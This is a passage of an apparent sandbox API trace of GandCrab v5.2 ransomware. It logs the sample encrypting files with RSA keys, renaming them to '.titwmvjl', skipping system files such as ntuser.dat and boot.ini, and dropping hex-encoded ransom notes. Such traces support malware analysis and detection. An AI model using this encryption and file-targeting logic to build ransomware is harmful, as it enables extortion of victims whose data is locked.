dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ec [0079.063] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.063] ReadFile (in: hFile=0x2ec, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259dfd0*=0x21c, lpOverlapped=0x0) returned 1 [0079.073] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.073] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.073] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0079.076] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0079.076] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0079.076] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0079.076] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259df8c | out: pbBuffer=0x259df8c) returned 1 [0079.076] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.077] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0079.077] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.077] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.077] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0079.080] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0079.080] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0079.080] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0079.080] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259dfac | out: pbBuffer=0x259dfac) returned 1 [0079.080] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.080] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0079.080] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.080] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.081] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0079.084] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.084] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x503438) returned 1 [0079.084] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.084] CryptGetKeyParam (in: hKey=0x503438, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0079.084] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.084] CryptEncrypt (in: hKey=0x503438, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259df24*=0x100) returned 1 [0079.084] GetLastError () returned 0x0 [0079.084] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.084] CryptDestroyKey (hKey=0x503438) returned 1 [0079.084] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.085] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0079.085] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.085] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0079.087] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.088] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x5037b8) returned 1 [0079.088] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.088] CryptGetKeyParam (in: hKey=0x5037b8, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0079.088] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.088] CryptEncrypt (in: hKey=0x5037b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259df24*=0x100) returned 1 [0079.088] GetLastError () returned 0x0 [0079.088] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.088] CryptDestroyKey (hKey=0x5037b8) returned 1 [0079.088] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.089] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0079.089] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0079.089] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0079.089] ReadFile (in: hFile=0x2ec, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259dfd0*=0x141f, lpOverlapped=0x0) returned 1 [0079.101] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xffffebe1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.101] WriteFile (in: hFile=0x2ec, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x141f, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259dfb4*=0x141f, lpOverlapped=0x0) returned 1 [0079.104] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.104] WriteFile (in: hFile=0x2ec, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259dfb4*=0x21c, lpOverlapped=0x0) returned 1 [0079.105] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.108] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.108] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.109] CloseHandle (hObject=0x2ec) returned 1 [0079.110] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328998[[fn=Rings]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328998[[fn=rings]].glox"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328998[[fn=Rings]].glox.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328998[[fn=rings]].glox.titwmvjl"), dwFlags=0x1) returned 1 [0079.110] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.111] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 0 [0079.111] FindClose (in: hFindFile=0x503738 | out: hFindFile=0x503738) returned 1 [0079.111] CloseHandle (hObject=0x2e4) returned 1 [0079.111] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 1 [0079.112] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0079.112] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0079.112] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\d2ca4a09d2ca4deb61a.lock" [0079.112] lstrlenW (lpString=".titwmvjl") returned 9 [0079.112] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\d2ca4a09d2ca4deb61a.lock") returned 123 [0079.112] VirtualAlloc (lpAddress=0x0, dwSize=0x136, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.112] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 132 [0079.112] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\d2ca4a09d2ca4deb61a.lock") returned 123 [0079.112] lstrlenW (lpString=".lock") returned 5 [0079.112] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.112] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0079.112] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.112] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.112] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 1 [0079.112] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0079.112] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0079.113] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\TITWMVJL-DECRYPT.txt" [0079.113] lstrlenW (lpString=".titwmvjl") returned 9 [0079.113] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\TITWMVJL-DECRYPT.txt") returned 119 [0079.113] VirtualAlloc (lpAddress=0x0, dwSize=0x12e, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.113] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 128 [0079.113] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\TITWMVJL-DECRYPT.txt") returned 119 [0079.113] lstrlenW (lpString=".txt") returned 4 [0079.113] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.113] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0079.113] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0079.113] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.113] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\TITWMVJL-DECRYPT.txt") returned 119 [0079.113] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\TITWMVJL-DECRYPT.txt") returned 119 [0079.113] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0079.113] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0079.113] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0079.113] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0079.113] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0079.113] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0079.113] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0079.113] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0079.113] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.114] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 0 [0079.114] FindClose (in: hFindFile=0x503938 | out: hFindFile=0x503938) returned 1 [0079.115] CloseHandle (hObject=0x2dc) returned 1 [0079.115] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0079.115] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0079.115] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0079.115] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\TITWMVJL-DECRYPT.txt" [0079.115] lstrlenW (lpString=".titwmvjl") returned 9 [0079.115] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\TITWMVJL-DECRYPT.txt") returned 101 [0079.115] VirtualAlloc (lpAddress=0x0, dwSize=0x10a, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.115] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 110 [0079.116] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\TITWMVJL-DECRYPT.txt") returned 101 [0079.116] lstrlenW (lpString=".txt") returned 4 [0079.116] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.116] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0079.116] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0079.116] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.116] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\TITWMVJL-DECRYPT.txt") returned 101 [0079.116] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\TITWMVJL-DECRYPT.txt") returned 101 [0079.116] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0079.116] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0079.116] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0079.116] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0079.116] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0079.116] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0079.116] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0079.116] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0079.116] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.116] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 0 [0079.116] FindClose (in: hFindFile=0x503578 | out: hFindFile=0x503578) returned 1 [0079.117] CloseHandle (hObject=0x2d4) returned 1 [0079.118] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0079.118] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0079.118] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0079.118] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\TITWMVJL-DECRYPT.txt" [0079.118] lstrlenW (lpString=".titwmvjl") returned 9 [0079.118] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\TITWMVJL-DECRYPT.txt") returned 93 [0079.118] VirtualAlloc (lpAddress=0x0, dwSize=0xfa, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.118] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 102 [0079.118] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\TITWMVJL-DECRYPT.txt") returned 93 [0079.118] lstrlenW (lpString=".txt") returned 4 [0079.118] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.118] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0079.118] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0079.118] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.118] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\TITWMVJL-DECRYPT.txt") returned 93 [0079.118] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\TITWMVJL-DECRYPT.txt") returned 93 [0079.118] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0079.118] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0079.118] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0079.118] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0079.118] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0079.118] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0079.119] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0079.119] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0079.119] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.119] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0079.119] lstrcmpW (lpString1="User", lpString2=".") returned 1 [0079.119] lstrcmpW (lpString1="User", lpString2="..") returned 1 [0079.119] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\", lpString2="User" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User" [0079.119] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\" [0079.119] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0079.119] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.119] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0079.119] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.119] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0079.120] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.120] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0079.120] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0079.120] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0079.120] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.120] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.120] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\\\TITWMVJL-DECRYPT.txt") returned 99 [0079.120] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\user\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0079.121] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\